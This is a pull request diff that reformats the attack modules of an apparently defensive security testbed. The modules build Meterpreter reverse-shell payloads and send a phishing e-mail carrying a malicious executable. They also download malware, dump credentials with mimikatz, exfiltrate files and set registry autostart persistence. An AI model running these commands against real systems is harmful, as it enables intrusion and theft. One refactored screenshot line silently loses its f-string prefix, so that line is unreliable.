### PR TITLE
Clean up old code and formatting errors

### DIFF
--- a/src/attacks/__init__.py
+++ b/src/attacks/__init__.py
@@ -29,7 +29,8 @@ attack_module_names = [
     file.split(".py")[0] for file in os.listdir(module_dir)
     if file.startswith("attack_") and file.endswith(".py")]
 
-attack_modules = [import_module("." + str(attack_module_name), package=package) for attack_module_name in attack_module_names]
+attack_modules = [import_module("." + str(attack_module_name), package=package)
+                  for attack_module_name in attack_module_names]
 
 attack_subclasses = set()
 for attack_module in attack_modules:

--- a/src/attacks/attack.py
+++ b/src/attacks/attack.py
@@ -20,7 +20,6 @@ import re
 import socket
 from contextlib import contextmanager
 from types import SimpleNamespace
-from signal import SIGINT, default_int_handler, signal
 
 import paramiko
 from attacks.printer import Printer, ListPrinter, MultiPrinter

--- a/src/attacks/attack_c2_exfiltration.py
+++ b/src/attacks/attack_c2_exfiltration.py
@@ -70,8 +70,9 @@ class C2ExfiltrationAttack(Attack):
             self.handler.shutdown()
 
     def _collect_files(self):
+        path = self.options.path
+        pattern = self.options.pattern
         self.ssh_client.write_lines(self.handler.stdin, [
-            "run file_collector -r -d {path} -f {pattern} -o /root/loot/files.txt".format(
-                path=self.options.path, pattern=self.options.pattern),
+            f"run file_collector -r -d {path} -f {pattern} -o /root/loot/files.txt",
             "run file_collector -i /root/loot/files.txt -l /root/loot",
             "background"])

--- a/src/attacks/attack_change_wallpaper.py
+++ b/src/attacks/attack_change_wallpaper.py
@@ -62,6 +62,6 @@ class ChangeWallpaperAttack(Attack):
             self.handler.shutdown()
 
     def _collect_files(self):
-        self.ssh_client.write_lines(self.handler.stdin, [
-            "execute -H -f powershell -a {script}".format(script=self.change_wallpaper_ps_script),
-            "background"])
+        script = self.change_wallpaper_ps_script
+        self.ssh_client.write_lines(self.handler.stdin, [f"execute -H -f powershell -a {script}",
+                                                         "background"])

--- a/src/attacks/attack_download_malware.py
+++ b/src/attacks/attack_download_malware.py
@@ -46,8 +46,9 @@ class DownloadMalwareAttack(Attack):
         self.ssh_client.target.username = "ssh"
 
     def _download_command(self):
+        url = self.options.url
+        file = self.options.file
         return (
             "cmd /C powershell -Command $c = new-object System.Net.WebClient; "
-            "$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
-            "echo File downloaded successfully.".format(
-                url=self.options.url, file=self.options.file))
+            f"$c.DownloadFile(\\\"{url}\\\", \\\"{file}\\\") && "
+            "echo File downloaded successfully.")

--- a/src/attacks/attack_download_malware_meterpreter.py
+++ b/src/attacks/attack_download_malware_meterpreter.py
@@ -64,6 +64,7 @@ class DownloadMalwareMeterpreterAttack(Attack):
             self.handler.shutdown()
 
     def _collect_files(self):
-        self.ssh_client.write_lines(self.handler.stdin, [
-            "upload {rfile} {file}".format(rfile=self.remote_file, file=self.options.file),
-            "background"])
+        rfile = self.remote_file
+        file = self.options.file
+        self.ssh_client.write_lines(self.handler.stdin, [f"upload {rfile} {file}",
+                                                         "background"])

--- a/src/attacks/attack_email_exe.py
+++ b/src/attacks/attack_email_exe.py
@@ -53,13 +53,14 @@ class EmailEXEAttack(Attack):
         return meterpreter_script
 
     def _sendemail_command(self, message):
+        address = self.options.addr
         return " ".join([
             "sendemail",
             "-f attacker@localdomain",
-            "-t {addr}".format(addr=self.options.addr),
+            f"-t {address}",
             "-s 172.18.0.2",
             "-u 'Frozen User Account'",
-            "-m '{msg}'".format(msg=message),
+            f"-m '{message}'",
             "-a '/root/Bank-of-Nuthington.exe'",
             "-o tls=no",
             "-o message-content-type=html",
@@ -67,9 +68,10 @@ class EmailEXEAttack(Attack):
             ""])
 
     def _email_body(self):
+        name = self.options.name
         return (
             "<p><img src=\"http://172.18.1.1/email_header.jpg\" width=\"1100\" height=\"300\"></p>"
-            "<p>Dear {name},</p>"
+            f"<p>Dear {name},</p>"
             "<p>our Technical Support Team unfortunately had to freeze your bank account."
             "   Please download and execute the file provided in the attachment for further"
             "   information.</p>"
@@ -77,4 +79,4 @@ class EmailEXEAttack(Attack):
             "   collaboration. This is an automated e-mail. Please do not respond.</p>"
             "<p><img src=\"http://172.18.1.1/email_footer.jpg\" width=\"90\" height=\"90\"></p>"
             "<p>&copy; 2017 bankofnuthington.co.uk. All Rights Reserved.</p>"
-            "".format(name=self.options.name))
+            "")

--- a/src/attacks/attack_email_exe.py
+++ b/src/attacks/attack_email_exe.py
@@ -47,7 +47,9 @@ class EmailEXEAttack(Attack):
     def _generate_exe_command(self):
         lhost = self.options.lhost
         lport = self.options.lport
-        meterpreter_script = f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe"
+        meterpreter_script = ("msfvenom -p windows/x64/meterpreter/reverse_http "
+                              f"LHOST={lhost} LPORT={lport} -a x64 StagerRetryCount=604800 "
+                              "-f exe-only -o /root/Bank-of-Nuthington.exe")
         return meterpreter_script
 
     def _sendemail_command(self, message):

--- a/src/attacks/attack_flashdrive_exe.py
+++ b/src/attacks/attack_flashdrive_exe.py
@@ -49,8 +49,8 @@ class FlashdriveEXEAttack(Attack):
         lhost = self.options.lhost
         lport = self.options.lport
         meterpreter_script = (
-        	f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} "
-        	"-a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
+            f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST={lhost} LPORT={lport} "
+            "-a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
         return meterpreter_script
 
     def _generate_image_commands(self):
@@ -69,6 +69,6 @@ class FlashdriveEXEAttack(Attack):
         image_path = self.image_path
         rhost = self.options.rhost
         upload_command = (
-        	f"sshpass -p 'breach' scp {image_path} ssh@{rhost}:/BREACH/ "
-        	"&& echo 'Image file successfully sent'")
+            f"sshpass -p 'breach' scp {image_path} ssh@{rhost}:/BREACH/ "
+            "&& echo 'Image file successfully sent'")
         return upload_command

--- a/src/attacks/attack_flashdrive_exfiltration.py
+++ b/src/attacks/attack_flashdrive_exfiltration.py
@@ -44,7 +44,8 @@ class FlashdriveExfiltrationAttack(Attack):
         self.ssh_client.target.username = "ssh"
 
     def _copy_files_to_flashdrive_commands(self):
+        directory = self.options.rdir
         return [
             "imdisk -a -s 64M -m L: -p \"/fs:ntfs /q /y\"",
-            "xcopy /E \"{dir}\" L:".format(dir=self.options.rdir),
+            f"xcopy /E \"{directory}\" L:",
             "imdisk -D -m L:"]

--- a/src/attacks/attack_hashdump.py
+++ b/src/attacks/attack_hashdump.py
@@ -56,7 +56,7 @@ class HashdumpAttack(Attack):
                 self._respond(line)
                 self.print(line)
         except UnicodeDecodeError as e:
-            self.print("UnicodeDecodeError: {}".format(e))
+            self.print(f"UnicodeDecodeError: {e}")
             self.handler.shutdown()
 
     def _respond(self, line):

--- a/src/attacks/attack_mimikatz.py
+++ b/src/attacks/attack_mimikatz.py
@@ -76,4 +76,3 @@ class MimikatzAttack(Attack):
             "load kiwi",
             "creds_all",
             "background"])
-

--- a/src/attacks/attack_mimikatz.py
+++ b/src/attacks/attack_mimikatz.py
@@ -54,7 +54,7 @@ class MimikatzAttack(Attack):
                 self._respond(line)
                 self.print(line)
         except UnicodeDecodeError as e:
-            self.print("UnicodeDecodeError: {}".format(e))
+            self.print(f"UnicodeDecodeError: {e}")
             self.handler.shutdown()
 
     def _respond(self, line):

--- a/src/attacks/attack_set_autostart.py
+++ b/src/attacks/attack_set_autostart.py
@@ -46,7 +46,8 @@ class SetAutostartAttack(Attack):
         self.ssh_client.target.username = "ssh"
 
     def _autostart_command(self):
+        name = self.options.name
+        data = self.options.data
         return (
             "REG ADD HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
-            "/v \"{name}\" /t REG_SZ /d \"{data}\" /f".format(
-                name=self.options.name, data=self.options.data))
+            f"/v \"{name}\" /t REG_SZ /d \"{data}\" /f")

--- a/src/attacks/attack_take_screenshot.py
+++ b/src/attacks/attack_take_screenshot.py
@@ -67,6 +67,6 @@ class TakeScreenshotAttack(Attack):
             self.handler.shutdown()
 
     def _collect_files(self):
-        self.ssh_client.write_lines(self.handler.stdin, [
-            "screenshot -p {file}".format(file=self.screenshot_file),
-            "background"])
+        file = self.screenshot_file
+        self.ssh_client.write_lines(self.handler.stdin, ["screenshot -p {file}",
+                                                         "background"])

--- a/src/attacks/attackconsole.py
+++ b/src/attacks/attackconsole.py
@@ -154,8 +154,8 @@ class SubAttackConsole(Cmd):
                 option.startswith(text)]
 
     def do_reset(self, _arg):
-            self.attack.options._set_options_to_none()
-            self.attack.options._set_defaults()
+        self.attack.options._set_options_to_none()
+        self.attack.options._set_defaults()
 
     def do_run(self, arg):
         attack_name = self.attack.info.name

--- a/src/attacks/attackconsole.py
+++ b/src/attacks/attackconsole.py
@@ -75,7 +75,7 @@ class ISOFormatter(logging.Formatter):
         tz = cls._tz_fix.match(time.strftime("%z"))
         if time.timezone and tz:
             offset_hrs, offset_min = tz.groups()
-            isotime += "{0}:{1}".format(offset_hrs, offset_min)
+            isotime += f"{offset_hrs}:{offset_min}"
         else:
             isotime += "Z"
         record.__dict__["isotime"] = isotime
@@ -113,7 +113,7 @@ class SubAttackConsole(Cmd):
             option: self.options_class.__dict__[option]
             for option in self.attack_options}
         self.attack = self.attack_class(printer=ConsolePrinter())
-        self.prompt = "attackconsole ({name}) > ".format(name=self.attack_class.info.name)
+        self.prompt = f"attackconsole ({self.attack_class.info.name}) > "
 
     def precmd(self, line):
         if not self._stdin_is_a_tty():
@@ -165,7 +165,7 @@ class SubAttackConsole(Cmd):
         try:
             self.attack.run()
         except AttackException as e:
-            print("*** Exception: {e}".format(e=e))
+            print(f"*** Exception: {e}")
             log_dict.update(event="attack_failed", failed_with=str(e).replace("\n", " "))
             self.logger.info("Attack failed", log_dict=log_dict)
         except KeyboardInterrupt:
@@ -222,7 +222,7 @@ class AttackConsole(Cmd):
                 attack_class=self.attack_classes[attack], **self.kwargs)
             sub_attack_console.cmdloop()
         else:
-            print("*** Unknown attack: {attack}".format(attack=attack))
+            print(f"*** Unknown attack: {attack}")
 
     def complete_use(self, text, line, begidx, endidx):
         return [attack for attack in self.attack_classes.keys() if attack.startswith(text)]
@@ -256,7 +256,7 @@ class IntroGenerator:
         intro = "\n".join([
             fortune,
             "+ -- - -= [\t BREACH Attack Console \t\t]",
-            "+ -- - -= [\t {} attack(s)          \t\t]".format(len(implemented_attacks)),
+            f"+ -- - -= [\t {len(implemented_attacks)} attack(s)          \t\t]",
             ""])
         return intro
 

--- a/src/attacks/reverseconnectionhandler.py
+++ b/src/attacks/reverseconnectionhandler.py
@@ -15,7 +15,9 @@
 # You should have received a copy of the GNU General Public License
 # along with SOCBED. If not, see <http://www.gnu.org/licenses/>.
 
+
 import time
+
 
 class ReverseConnectionHandler:
     handler_timeout = 330

--- a/src/attacks/reverseconnectionhandler.py
+++ b/src/attacks/reverseconnectionhandler.py
@@ -42,12 +42,12 @@ class ReverseConnectionHandler:
             "\""
             "use exploit/multi/handler;"
             "set payload windows/x64/meterpreter/reverse_http;"
-            "set lhost {lhost};"
-            "set lport {lport};"
-            "set ReverseListenerBindAddress {lhost};"
-            "set ListenerTimeout {timeout};"
+            f"set lhost {self.lhost};"
+            f"set lport {self.lport};"
+            f"set ReverseListenerBindAddress {self.lhost};"
+            f"set ListenerTimeout {self.handler_timeout};"
             "exploit;"
-            "\"".format(lhost=self.lhost, lport=self.lport, timeout=self.handler_timeout))
+            "\"")
 
     def shutdown(self):
         self.stdin.write("exit -y\n")

--- a/src/attacks/ssh.py
+++ b/src/attacks/ssh.py
@@ -23,6 +23,7 @@ from types import SimpleNamespace
 import paramiko
 from attacks.util import print_command
 
+
 class SSHTarget(SimpleNamespace):
     name = ""
     hostname = ""

--- a/src/attacks/tests/test_attack.py
+++ b/src/attacks/tests/test_attack.py
@@ -18,7 +18,7 @@
 
 import pytest
 import socket
-from unittest.mock import patch, Mock
+from unittest.mock import Mock
 
 from attacks.attack import AttackInfo, AttackOptions, Attack, AttackException
 

--- a/src/attacks/tests/test_attack_c2_exfiltration.py
+++ b/src/attacks/tests/test_attack_c2_exfiltration.py
@@ -32,7 +32,7 @@ def attack():
     return attack
 
 
-class TestC2ExfiltrationAttack():
+class TestC2ExfiltrationAttack:
     def test_raise_exception_bad_output(self, attack: C2ExfiltrationAttack):
         attack.ssh_client.exec_command = Mock(return_value=(Mock(), ["Bad output"], []))
         with pytest.raises(AttackException):

--- a/src/attacks/tests/test_attack_email_exe.py
+++ b/src/attacks/tests/test_attack_email_exe.py
@@ -33,7 +33,9 @@ def attack():
 class TestEmailEXEAttack:
     def test_generate_exe_command(self, attack: EmailEXEAttack):
         exe_command = attack._generate_exe_command()
-        expected_exe_command = f"msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.18.0.3 LPORT=80 -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe"
+        expected_exe_command = ("msfvenom -p windows/x64/meterpreter/reverse_http "
+                                "LHOST=172.18.0.3 LPORT=80 -a x64 StagerRetryCount=604800 "
+                                "-f exe-only -o /root/Bank-of-Nuthington.exe")
         assert exe_command == expected_exe_command
 
     def test_sendemail_command(self, attack: EmailEXEAttack):

--- a/src/attacks/tests/test_attack_flashdrive_exe.py
+++ b/src/attacks/tests/test_attack_flashdrive_exe.py
@@ -34,8 +34,8 @@ class TestFlashdriveEXEAttack:
     def test_generate_exe_command(self, attack: FlashdriveEXEAttack):
         exe_command = attack._generate_exe_command()
         expected_exe_command = (
-        	"msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.18.0.3 "
-        	"LPORT=80 -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
+            "msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.18.0.3 "
+            "LPORT=80 -a x64 StagerRetryCount=604800 -f exe-only -o /root/Bank-of-Nuthington.exe")
         assert exe_command == expected_exe_command
 
     def test_generate_image_commands(self, attack: FlashdriveEXEAttack):
@@ -53,9 +53,9 @@ class TestFlashdriveEXEAttack:
     def test_upload_image_to_client_command(self, attack: FlashdriveEXEAttack):
         upload_command = attack._upload_image_to_client_command()
         expected_upload_command = (
-        	"sshpass -p 'breach' scp /root/evil_image_file.img "
-        	"ssh@192.168.56.101:/BREACH/ && echo 'Image file successfully sent'")
-            
+            "sshpass -p 'breach' scp /root/evil_image_file.img "
+            "ssh@192.168.56.101:/BREACH/ && echo 'Image file successfully sent'")
+
         assert upload_command == expected_upload_command
 
     def test_raise_exception_bad_output(self, attack: FlashdriveEXEAttack):

--- a/src/attacks/tests/test_attack_hashdump.py
+++ b/src/attacks/tests/test_attack_hashdump.py
@@ -32,7 +32,7 @@ def attack():
     return attack
 
 
-class TestHashdumpAttack():
+class TestHashdumpAttack:
     def test_raise_exception_bad_output(self, attack: HashdumpAttack):
         attack.ssh_client.exec_command = Mock(return_value=(Mock(), ["Bad output"], []))
         with pytest.raises(AttackException):

--- a/src/attacks/tests/test_attack_mimikatz.py
+++ b/src/attacks/tests/test_attack_mimikatz.py
@@ -32,7 +32,7 @@ def attack():
     return attack
 
 
-class TestMimikatzAttack():
+class TestMimikatzAttack:
     def test_raise_exception_bad_output(self, attack: MimikatzAttack):
         attack.ssh_client.exec_command = Mock(return_value=(Mock(), ["Bad output"], []))
         with pytest.raises(AttackException):
@@ -42,4 +42,3 @@ class TestMimikatzAttack():
         indicator = "2aca7635afdc3febc408bee6b89acf16"
         attack.ssh_client.exec_command = Mock(return_value=(Mock(), [indicator], []))
         attack.run()
-

--- a/src/attacks/tests/test_attack_sqlmap.py
+++ b/src/attacks/tests/test_attack_sqlmap.py
@@ -23,6 +23,7 @@ import pytest
 from attacks import AttackException
 from attacks.attack_sqlmap import SQLMapAttack
 
+
 @pytest.fixture()
 def attack():
     SQLMapAttack.ssh_client_class = Mock

--- a/src/attacks/tests/test_attackconsole.py
+++ b/src/attacks/tests/test_attackconsole.py
@@ -14,15 +14,14 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with SOCBED. If not, see <http://www.gnu.org/licenses/>.
-import traceback
+
 
 from contextlib import redirect_stdout
-from unittest.mock import Mock, patch, MagicMock
+from unittest.mock import Mock, patch
 
 import io
 import pytest
 
-import attacks
 from attacks.attack import Attack, AttackOptions, AttackInfo, AttackException
 from attacks.attackconsole import AttackConsole, SubAttackConsole, parse_args
 

--- a/src/attacks/tests/test_generateattackchains.py
+++ b/src/attacks/tests/test_generateattackchains.py
@@ -125,7 +125,7 @@ class TestAttackBlockConsistency:
             assert block[-2].split()[0] == "run"
 
 
-class TestGraphConsistency():
+class TestGraphConsistency:
     start_attacks = AttackGraph.start_attacks
     end_attacks = AttackGraph.end_attacks
     successors = AttackGraph.attack_dict
@@ -152,7 +152,7 @@ class TestGraphConsistency():
         # ToDo: write test for valid end node
 
 
-class TestDeterminism():
+class TestDeterminism:
     def test_same_script_for_same_seed(self):
         number_of_chains = 100
         assert generate_script(seed=42, number_of_chains=number_of_chains) == generate_script(
@@ -187,7 +187,7 @@ def acg(request):
     return generator
 
 
-class TestAttackChainGenerator():
+class TestAttackChainGenerator:
     def test_chain_sequence_contain_right_number_of_chains(self, acg: AttackChainGenerator):
         acg.generate = Mock(return_value="attack_chain")
         res = acg.generate_sequence(50)
@@ -214,7 +214,7 @@ class AttackDummy(Attack):
     info = AttackInfo(name="attack_dummy")
 
 
-class TestAttackBlockGenerator():
+class TestAttackBlockGenerator:
     abg = AttackBlockGenerator()
     block = abg.generate(AttackDummy())
 


### PR DESCRIPTION
[Only affects files in `src/attacks` for now]
- Imposed PEP8 standard wherever possible
- Removed unused import statements
- Replace old str.format() syntax with f-Strings
    - where appropriate, the former has been kept when replacing it would compromise readability

Will be open to merge as soon as the [corresponding pipeline](https://github.com/fkie-cad/socbed/actions/runs/3097493235) succeeds. None of the changes here should affect any actual code behavior, but you never know.